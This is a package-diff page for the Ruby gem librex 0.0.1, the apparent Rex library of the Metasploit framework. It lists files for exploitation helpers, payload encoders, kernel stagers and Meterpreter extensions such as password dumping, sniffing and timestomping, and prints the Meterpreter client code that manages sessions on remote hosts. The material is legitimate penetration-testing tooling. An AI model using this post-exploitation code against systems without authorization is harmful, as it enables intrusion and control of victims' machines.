RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/client.rb ADDED

@@ -0,0 +1,335 @@
+#!/usr/bin/env ruby
+require 'socket'
+require 'openssl'
+require 'rex/script'
+require 'rex/post/meterpreter/client_core'
+require 'rex/post/meterpreter/channel'
+require 'rex/post/meterpreter/channel_container'
+require 'rex/post/meterpreter/dependencies'
+require 'rex/post/meterpreter/object_aliases'
+require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/packet_parser'
+require 'rex/post/meterpreter/packet_dispatcher'
+module Rex
+module Post
+module Meterpreter
+#
+# Just to get it in there...
+#
+module Extensions
+end
+###
+#
+# This class represents a logical meterpreter client class.  This class
+# provides an interface that is compatible with the Rex post-exploitation
+# interface in terms of the feature set that it attempts to expose.  This
+# class is meant to drive a single meterpreter client session.
+#
+###
+class Client
+	include Rex::Post::Meterpreter::PacketDispatcher
+	include Rex::Post::Meterpreter::ChannelContainer
+	#
+	# Extension name to class hash.
+	#
+	@@ext_hash = {}
+	#
+	# Checks the extension hash to see if a class has already been associated
+	# with the supplied extension name.
+	#
+	def self.check_ext_hash(name)
+		@@ext_hash[name]
+	end
+	#
+	# Stores the name to class association for the supplied extension name.
+	#
+	def self.set_ext_hash(name, klass)
+		@@ext_hash[name] = klass
+	end
+	#
+	# Initializes the client context with the supplied socket through
+	# which communication with the server will be performed.
+	#
+	def initialize(sock,opts={})
+		init_meterpreter(sock, opts)
+	end
+	#
+	# Cleans up the meterpreter instance, terminating the dispatcher thread.
+	#
+	def cleanup_meterpreter
+		dispatcher_thread.kill if dispatcher_thread
+	end
+	#
+	# Initializes the meterpreter client instance
+	#
+	def init_meterpreter(sock,opts={})
+		self.sock        = sock
+		self.parser      = PacketParser.new
+		self.ext         = ObjectAliases.new
+		self.ext_aliases = ObjectAliases.new
+		self.alive       = true
+		self.target_id   = opts[:target_id]
+		self.response_timeout =  opts[:timeout] || self.class.default_timeout
+		self.send_keepalives  = true
+		# Switch the socket to SSL mode and receive the hello if needed
+		if not opts[:skip_ssl]
+			swap_sock_plain_to_ssl()
+		end
+		register_extension_alias('core', ClientCore.new(self))
+		initialize_inbound_handlers
+		initialize_channels
+		# Register the channel inbound packet handler
+		register_inbound_handler(Rex::Post::Meterpreter::Channel)
+		monitor_socket
+	end
+	def swap_sock_plain_to_ssl
+		# Create a new SSL session on the existing socket
+		ctx = generate_ssl_context()
+		ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
+		ssl.accept
+		self.sock.extend(Rex::Socket::SslTcp)
+		self.sock.sslsock = ssl
+		self.sock.sslctx  = ctx
+		tag = self.sock.get_once(-1, 30)
+		if(not tag or tag !~ /^GET \//)
+			raise RuntimeError, "Could not read the HTTP hello token"
+		end
+	end
+	def swap_sock_ssl_to_plain
+		# Remove references to the SSLSocket and Context
+		self.sock.sslsock.close
+		self.sock.sslsock = nil
+		self.sock.sslctx  = nil
+		self.sock = self.sock.fd
+		self.sock.extend(::Rex::Socket::Tcp)
+	end
+	def generate_ssl_context
+		key  = OpenSSL::PKey::RSA.new(1024){ }
+		cert = OpenSSL::X509::Certificate.new
+		cert.version = 2
+		cert.serial  = rand(0xFFFFFFFF)
+		subject = OpenSSL::X509::Name.new([
+				["C","US"],
+				['ST', Rex::Text.rand_state()],
+				["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
+				["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
+				["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
+			])
+		issuer = OpenSSL::X509::Name.new([
+				["C","US"],
+				['ST', Rex::Text.rand_state()],
+				["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
+				["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
+				["CN", Rex::Text.rand_text_alpha(rand(20) + 10)],
+			])
+		cert.subject = subject
+		cert.issuer = issuer
+		cert.not_before = Time.now - (3600 * 365) + rand(3600 * 14)
+		cert.not_after = Time.now + (3600 * 365) + rand(3600 * 14)
+		cert.public_key = key.public_key
+		ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
+		cert.extensions = [
+			ef.create_extension("basicConstraints","CA:FALSE"),
+			ef.create_extension("subjectKeyIdentifier","hash"),
+			ef.create_extension("extendedKeyUsage","serverAuth"),
+			ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
+		]
+		ef.issuer_certificate = cert
+		cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
+		cert.sign(key, OpenSSL::Digest::SHA1.new)
+		ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
+		ctx.key = key
+		ctx.cert = cert
+		ctx.session_id_context = Rex::Text.rand_text(16)
+		return ctx
+	end
+	#
+	# Runs the meterpreter script in the context of a script container
+	#
+	def execute_file(file, args)
+		o = Rex::Script::Meterpreter.new(self, file)
+		o.run(args)
+	end
+	##
+	#
+	# Accessors
+	#
+	##
+	#
+	# Returns the default timeout that request packets will use when
+	# waiting for a response.
+	#
+	def Client.default_timeout
+		return 30
+	end
+	##
+	#
+	# Alias processor
+	#
+	##
+	#
+	# Translates unhandled methods into registered extension aliases
+	# if a matching extension alias exists for the supplied symbol.
+	#
+	def method_missing(symbol, *args)
+		self.ext_aliases.aliases[symbol.to_s]
+	end
+	##
+	#
+	# Extension registration
+	#
+	##
+	#
+	# Loads the client half of the supplied extension and initializes it as a
+	# registered extension that can be reached through client.ext.[extension].
+	#
+	def add_extension(name)
+		# Check to see if this extension has already been loaded.
+		if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
+			old = Rex::Post::Meterpreter::Extensions.constants
+			require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
+			new = Rex::Post::Meterpreter::Extensions.constants
+			# No new constants added?
+			if ((diff = new - old).empty?)
+				return false
+			end
+			klass = Rex::Post::Meterpreter::Extensions.const_get(diff[0]).const_get(diff[0])
+			# Save the module name to class association now that the code is
+			# loaded.
+			self.class.set_ext_hash(name.downcase, klass)
+		end
+		# Create a new instance of the extension
+		inst = klass.new(self)
+		self.ext.aliases[inst.name] = inst
+		return true
+	end
+	#
+	# Deregisters an extension alias of the supplied name.
+	#
+	def deregister_extension(name)
+		self.ext.aliases.delete(name)
+	end
+	#
+	# Enumerates all of the loaded extensions.
+	#
+	def each_extension(&block)
+		self.ext.aliases.each(block)
+	end
+	#
+	# Registers an aliased extension that can be referenced through
+	# client.name.
+	#
+	def register_extension_alias(name, ext)
+		self.ext_aliases.aliases[name] = ext
+	end
+	#
+	# Registers zero or more aliases that are provided in an array.
+	#
+	def register_extension_aliases(aliases)
+		aliases.each { |a|
+			register_extension_alias(a['name'], a['ext'])
+		}
+	end
+	#
+	# Deregisters a previously registered extension alias.
+	#
+	def deregister_extension_alias(name)
+		self.ext_aliases.aliases.delete(name)
+	end
+	#
+	# Dumps the extension tree.
+	#
+	def dump_extension_tree()
+		items = []
+		items.concat(self.ext.dump_alias_tree('client.ext'))
+		items.concat(self.ext_aliases.dump_alias_tree('client'))
+		return items.sort
+	end
+	#
+	# The extension alias under which all extensions can be accessed by name.
+	# For example:
+	#
+	#    client.ext.stdapi
+	#
+	#
+	attr_reader   :ext
+	#
+	# The socket the client is communicating over.
+	#
+	attr_reader   :sock
+	#
+	# The timeout value to use when waiting for responses.
+	#
+	attr_accessor :response_timeout
+	#
+	# Whether to send pings every so often to determine liveness.
+	#
+	attr_accessor :send_keepalives
+	#
+	# Whether this session is alive.  If the socket is disconnected or broken,
+	# this will be false
+	#
+	attr_accessor :alive
+	#
+	# The unique target identifier for this payload
+	#
+	attr_accessor :target_id
+protected
+	attr_accessor :parser, :ext_aliases # :nodoc:
+	attr_writer   :ext, :sock # :nodoc:
+end
+end; end; end

data/lib/rex/post/meterpreter/client_core.rb ADDED

@@ -0,0 +1,274 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/extension'
+require 'rex/post/meterpreter/client'
+require 'msf/core/payload/windows'
+module Rex
+module Post
+module Meterpreter
+###
+#
+# This class is responsible for providing the interface to the core
+# client-side meterpreter API which facilitates the loading of extensions
+# and the interaction with channels.
+#
+#
+###
+class ClientCore < Extension
+	#
+	# Initializes the 'core' portion of the meterpreter client commands.
+	#
+	def initialize(client)
+		super(client, "core")
+	end
+	##
+	#
+	# Core commands
+	#
+	##
+	#
+	# Loads a library on the remote meterpreter instance.  This method
+	# supports loading both extension and non-extension libraries and
+	# also supports loading libraries from memory or disk depending
+	# on the flags that are specified
+	#
+	# Supported flags:
+	#
+	#	LibraryFilePath
+	#		The path to the library that is to be loaded
+	#
+	#	TargetFilePath
+	#		The target library path when uploading
+	#
+	#	UploadLibrary
+	#		Indicates whether or not the library should be uploaded
+	#
+	#	SaveToDisk
+	#		Indicates whether or not the library should be saved to disk
+	#		on the remote machine
+	#
+	#	Extension
+	#		Indicates whether or not the library is a meterpreter extension
+	#
+	def load_library(opts)
+		library_path = opts['LibraryFilePath']
+		target_path  = opts['TargetFilePath']
+		load_flags   = LOAD_LIBRARY_FLAG_LOCAL
+		# No library path, no cookie.
+		if (library_path == nil)
+			raise ArgumentError, "No library file path was supplied", caller
+		end
+		# Set up the proper loading flags
+		if (opts['UploadLibrary'])
+			load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
+		end
+		if (opts['SaveToDisk'])
